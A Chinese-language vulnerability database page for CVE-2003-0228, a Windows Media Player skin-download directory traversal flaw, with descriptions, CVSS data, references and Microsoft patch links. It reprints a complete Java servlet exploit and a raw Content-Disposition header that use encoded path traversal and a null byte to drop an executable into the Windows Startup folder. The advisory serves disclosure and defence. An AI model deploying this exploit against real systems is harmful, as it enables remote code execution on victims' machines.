CVE-2003-0228
CVSS7.5
发布时间 :2003-05-27 00:00:00
修订时间 :2016-10-17 22:31:01
NMCOES    

[原文]Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location.


[CNNVD]Windows媒体播放器外壳下载代码执行漏洞(MS03-017)(CNNVD-200305-070)

        
        Microsoft Windows Media Player是一款媒体播放器,提供使用"skins"来更改播放器的外观。外壳是由XML文件组织一个和多个文件完成,XML文件告诉Windows媒体播放器怎样使用这些文件显示给用户。
        Windows媒体播放器在处理下载外壳文件时存在问题,远程攻击者可以利用这个漏洞利用恶意页面上传任意文件到目标系统中任意位置。
        当Internet Explorer遇到MIME类型为"application/x-ms-wmz"的文档时,就会以"/layout"命令行选项启动wmplayer.exe来指示媒体播放器从指定的URL下载外壳文件到Media Player的外壳文件目录中。外了防止部分基于Internet的攻击,程序在下载路径中使用随机元素,这样可使下载的外壳文件名不会被攻击者猜测出来。
        Media Player存在一个缺陷,上面描述的功能可在URL中使用HEX编码的反斜线符号来绕过,如果可指定恶意URL并诱使用户访问,下载的文件夹就可以被选择。
        如果文件名不是以".WMZ"结尾,Media Player一般会在文件后增加这个扩展名,但是如果以特殊方法使用Content-disposition HTTP头字段,这个限制就可以绕过并且可以随意选择扩展名,因此攻击者结尾这两个问题就可以把任意文件存放在目标用户任意地方。
        攻击者可以利用恶意页面或恶意HTML形式EMAIL来诱使用户访问,下载外壳文件,触发漏洞。
        如果用户使用Outlook Express 6.0或Outlook 2002,或者使用了Outlook Email Security Update(http://office.microsoft.com/Downloads/2000/Out2ksec.aspx)的Outlook 98或2000,攻击就不会自动执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:windows_media_player:7.1Microsoft windows_media_player 7.1
cpe:/a:microsoft:windows_media_player:xpMicrosoft windows_media_player xp

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:321Windows Media Player Directory Traversal
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0228
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0228
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-070
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105232913516488&w=2
(UNKNOWN)  BUGTRAQ  20030507 Windows Media Player directory traversal vulnerability
http://marc.info/?l=bugtraq&m=105240528419389&w=2
(UNKNOWN)  BUGTRAQ  20030508 why i love xs4all + mediaplayer thingie
http://marc.info/?l=ntbugtraq&m=105233960728901&w=2
(UNKNOWN)  NTBUGTRAQ  20030507 Windows Media Player directory traversal vulnerability
http://www.kb.cert.org/vuls/id/384932
(UNKNOWN)  CERT-VN  VU#384932
http://www.microsoft.com/technet/security/bulletin/ms03-017.asp
(VENDOR_ADVISORY)  MS  MS03-017
http://www.securityfocus.com/bid/7517
(VENDOR_ADVISORY)  BID  7517
http://xforce.iss.net/xforce/xfdb/11953
(UNKNOWN)  XF  mediaplayer-skin-code-execution(11953)

- 漏洞信息

Windows媒体播放器外壳下载代码执行漏洞(MS03-017)
高危 输入验证
2003-05-27 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows Media Player是一款媒体播放器,提供使用"skins"来更改播放器的外观。外壳是由XML文件组织一个和多个文件完成,XML文件告诉Windows媒体播放器怎样使用这些文件显示给用户。
        Windows媒体播放器在处理下载外壳文件时存在问题,远程攻击者可以利用这个漏洞利用恶意页面上传任意文件到目标系统中任意位置。
        当Internet Explorer遇到MIME类型为"application/x-ms-wmz"的文档时,就会以"/layout"命令行选项启动wmplayer.exe来指示媒体播放器从指定的URL下载外壳文件到Media Player的外壳文件目录中。外了防止部分基于Internet的攻击,程序在下载路径中使用随机元素,这样可使下载的外壳文件名不会被攻击者猜测出来。
        Media Player存在一个缺陷,上面描述的功能可在URL中使用HEX编码的反斜线符号来绕过,如果可指定恶意URL并诱使用户访问,下载的文件夹就可以被选择。
        如果文件名不是以".WMZ"结尾,Media Player一般会在文件后增加这个扩展名,但是如果以特殊方法使用Content-disposition HTTP头字段,这个限制就可以绕过并且可以随意选择扩展名,因此攻击者结尾这两个问题就可以把任意文件存放在目标用户任意地方。
        攻击者可以利用恶意页面或恶意HTML形式EMAIL来诱使用户访问,下载外壳文件,触发漏洞。
        如果用户使用Outlook Express 6.0或Outlook 2002,或者使用了Outlook Email Security Update(http://office.microsoft.com/Downloads/2000/Out2ksec.aspx)的Outlook 98或2000,攻击就不会自动执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * Outlook Express 6.0和Outlook 2002默认设置是在限制区域中打开HTML邮件,使用Outlook 98和2000的用户需要通过Outlook E-mail安全升级来修正此漏洞:
        
        http://office.microsoft.com/downloads/2000/Out2ksec.aspx

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-017)以及相应补丁:
        MS03-017:Flaw in Windows Media Player Skins Downloading could allow Code Execution (817787)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-017.asp

        补丁下载:
         * Microsoft Windows Media Player 7.1:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=012F143A-77D1-4F6F-9338-5A6332614532&displaylang=en

         * Microsoft Windows Media Player for Windows XP (Version 8.0):
        
        http://microsoft.com/downloads/details.aspx?FamilyId=E311DF50-0633-4100-AB37-D7A68D51182F&displaylang=en

- 漏洞信息 (22570)

Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability (EDBID:22570)
windows remote
2003-05-07 Verified
0 Jelmer Kuperus
N/A [点击下载]
source: http://www.securityfocus.com/bid/7517/info

Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means. 

import javax.servlet.http.HttpServlet; 
import javax.servlet.http.HttpServletRequest; 
import javax.servlet.http.HttpServletResponse; 
import javax.servlet.ServletException; 
import javax.servlet.ServletOutputStream; 
import java.io.*; 
 
/** 
 * 
 * Microsoft media player 8 Exploit for windows XP English and Dutch versions 
 * 
 * It will drop a file in the startup folder 
 * 
 * modify web.xml to change what will be uploaded 
 * 
 * @author Jelmer Kuperus 
 * 
 */ 
 
public class MediaPlayerExploit extends HttpServlet { 
 
    private static final int BUFFER_SIZE = 1024; 
 
    private static final String[] paths = new String[] { 
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English 
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch 
    }; 
 
    private String payload; 
 
 
    public void init() throws ServletException { 
        payload = getInitParameter("executable"); 
    } 
 
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { 
 
        int language = 0; // default to english 
 
        try { 
            language = Integer.parseInt(request.getParameter("language")); 
        } catch (NumberFormatException ignored) {} 
 
        String path = paths[language]; 
 
        File file = new File(payload); 
 
        ServletOutputStream sos = response.getOutputStream(); 
 
        response.setContentType("application/download"); 
        response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz"); 
 
        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file)); 
        BufferedOutputStream bos = new BufferedOutputStream(sos); 
 
        byte buffer[] = new byte[BUFFER_SIZE]; 
 
        int datalength = 0; 
        while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { 
            bos.write(buffer,0,datalength); 
        } 
        bis.close(); 
        bos.close(); 
    } 
 
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { 
        doGet(request, response); 
    } 
 
} 
		

- 漏洞信息

7738
Microsoft Windows Media Player Skins File Arbitrary Command Execution
Loss of Integrity Patch / RCS
Vendor Verified

- 漏洞描述

- 时间线

2003-05-07 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Media Player Skin File Code Execution Vulnerability
Input Validation Error 7517
Yes No
2003-05-07 12:00:00 2009-07-11 09:07:00
Discovery of this vulnerability credited to Jouko Pynnonen of Oy Online Solutions Ltd, Finland and Jelmer.

- 受影响的程序版本

Microsoft Windows Media Player XP
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Microsoft Windows Media Player 7.1
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Windows Media Player 9.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition

- 不受影响的程序版本

Microsoft Windows Media Player 9.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition

- 漏洞讨论

Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means.

- 漏洞利用

The following HTTP headers will cause a .exe file to be saved to the Windows Startup folder on Windows XP systems:

Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz

The following exploit code was provided by "jelmer" <jelmer@kuperus.xs4all.nl>:

- 解决方案

Microsoft has released fixes:


Microsoft Windows Media Player 7.1

Microsoft Windows Media Player XP

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站